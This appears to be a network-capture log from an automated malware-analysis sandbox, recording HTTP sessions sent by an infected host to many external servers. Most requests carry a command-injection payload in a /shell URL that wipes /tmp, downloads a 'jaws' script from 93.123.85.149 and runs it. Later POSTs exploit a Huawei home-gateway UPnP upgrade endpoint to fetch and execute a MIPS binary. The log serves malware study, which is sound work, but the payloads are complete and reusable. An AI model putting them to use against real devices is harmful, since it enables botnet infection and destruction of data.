69 63 2f 69 63 6f 6e 73 2f 53 4e 2e 70 6e 67 27 29 20
                                                            Data Ascii: <html><head><meta type="copyright" content="Copyright (C) 1996-2016 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2016 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {margin-left: 15px;padding: 10px;padding-left: 100px;background: url('/squid-internal-static/icons/SN.png')
                                                            Jan 26, 2024 15:31:47.739504099 CET1286INData Raw: 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 3b 0a 7d 0a 0a 2f 2a 20 69 6e 69 74 69 61 6c 20 74 69 74 6c 65 20 2a 2f 0a 23 74 69 74 6c 65 73 20 68 31 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 23 74 69 74 6c 65 73 20 68 32 20
                                                            Data Ascii: no-repeat left;}/* initial title */#titles h1 {color: #000000;}#titles h2 {color: #000000;}/* special event: FTP success page titles */#titles ftpsuccess {background-color:#00ff00;width:100%;}/* Page displayed body content
                                                            Jan 26, 2024 15:31:47.739516973 CET1220INData Raw: 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 68 32 3e 0a 3c 2f 64 69 76 3e 0a 3c 68 72 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 70 3e 54 68 65 20 66 6f 6c 6c 6f 77
                                                            Data Ascii: sted URL could not be retrieved</h2></div><hr><div id="content"><p>The following error was encountered while trying to retrieve the URL: <a href="/shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws">/shell?cd+/tmp;rm+-rf+*;wget+


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            207192.168.2.235956252.85.131.24580
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:47.589436054 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:47.705430031 CET316INHTTP/1.1 403 Forbidden
                                                            Server: CloudFront
                                                            Date: Fri, 26 Jan 2024 14:31:47 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 151
                                                            Connection: keep-alive
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            208192.168.2.2353284156.244.93.14380
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:47.591942072 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:47.971647024 CET307INHTTP/1.1 400 Bad Request
                                                            Server: nginx
                                                            Date: Fri, 26 Jan 2024 14:31:47 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 150
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            209192.168.2.2343828205.196.223.11880
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:47.595460892 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:47.772265911 CET392INHTTP/1.1 400 Bad Request
                                                            Date: Fri, 26 Jan 2024 14:31:47 GMT
                                                            Server: Apache
                                                            Content-Length: 226
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            210192.168.2.2344912173.95.53.15480
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:47.666290998 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:47.806123018 CET450INHTTP/1.0 400 Bad Request
                                                            Content-Type: text/html
                                                            Content-Length: 345
                                                            Connection: close
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 Bad Request</title> </head> <body> <h1>400 Bad Request</h1> </body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            211192.168.2.2350944185.32.126.3280
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:47.670537949 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            212192.168.2.2346740123.136.83.1080
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:47.683670998 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:47.835164070 CET307INHTTP/1.1 400 Bad Request
                                                            Server: nginx
                                                            Date: Fri, 26 Jan 2024 14:31:47 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 150
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            213192.168.2.2352066208.106.233.17880
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:47.689172983 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:47.846205950 CET1286INHTTP/1.1 200 OK
                                                            Content-Length: 4417
                                                            Connection: Close
                                                            Cache-Control: no-cache
                                                            Content-Type: text/html; charset=utf-8
                                                            X-Frame-Options: SAMEORIGIN
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 38 3b 20 49 45 3d 45 44 47 45 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 36 61 36 61 36 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 6e 70 75 74 5b 74 79 70 65 3d 64 61 74 65 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 65 6d 61 69 6c 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 6e 75 6d 62 65 72 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 70 61 73 73 77 6f 72 64 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 73 65 61 72 63 68 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 74 65 6c 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 74 65 78 74 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 74 69 6d 65 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 75 72 6c 5d 2c 20 73 65 6c 65 63 74 2c 20 74 65 78 74 61 72 65 61 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 36 32 36 32 36 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 62 61 73 65 6c 69 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 2e 32 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 20 73 6f 6c 69 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 20 31 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 61 39 61 39 61 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 70 78 20 2e 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 61 70 70 65 61 72 61 6e 63 65 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                            Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=8; IE=EDGE"> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { height: 100%; font-family: Helvetica, Arial, sans-serif; color: #6a6a6a; margin: 0; display: flex; align-items: center; justify-content: center; } input[type=date], input[type=email], input[type=number], input[type=password], input[type=search], input[type=tel], input[type=text], input[type=time], input[type=url], select, textarea { color: #262626; vertical-align: baseline; margin: .2em; border-style: solid; border-width: 1px; border-color: #a9a9a9; background-color: #fff; box-sizing: border-box; padding: 2px .5em; appearance: none;
                                                            Jan 26, 2024 15:31:47.846220970 CET1286INData Raw: 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 6e 70 75 74 3a 66 6f 63 75 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72
                                                            Data Ascii: border-radius: 0; } input:focus { border-color: #646464; box-shadow: 0 0 1px 0 #a2a2a2; outline: 0; } button { padding: .5em 1em;
                                                            Jan 26, 2024 15:31:47.846231937 CET1286INData Raw: 72 67 62 61 28 30 2c 30 2c 30 2c 2e 35 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 61 62 6c 65 20 3e 20 74 62 6f 64 79 20 3e 20 74 72 20 3e 20 74 64 3a 66 69 72 73 74 2d 6f 66 2d 74 79 70 65 20 7b 0a
                                                            Data Ascii: rgba(0,0,0,.5); } table > tbody > tr > td:first-of-type { vertical-align: top; } table > tbody > tr > td { padding: .3em .3em; } .field {
                                                            Jan 26, 2024 15:31:47.846242905 CET761INData Raw: 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 74 65 78 74 2d 63 65 6e 74 65 72 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                            Data Ascii: font-size: 1em; } .text-centered { text-align: center; } .text-container { margin: 1em 1.5em; } .flex-container {


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            214192.168.2.2351952156.254.80.7037215
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:47.724802971 CET857OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                            Content-Length: 430
                                                            Connection: keep-alive
                                                            Accept: */*
                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                            Jan 26, 2024 15:31:49.284998894 CET857OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                            Content-Length: 430
                                                            Connection: keep-alive
                                                            Accept: */*
                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                            Jan 26, 2024 15:31:51.108684063 CET857OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                            Content-Length: 430
                                                            Connection: keep-alive
                                                            Accept: */*
                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 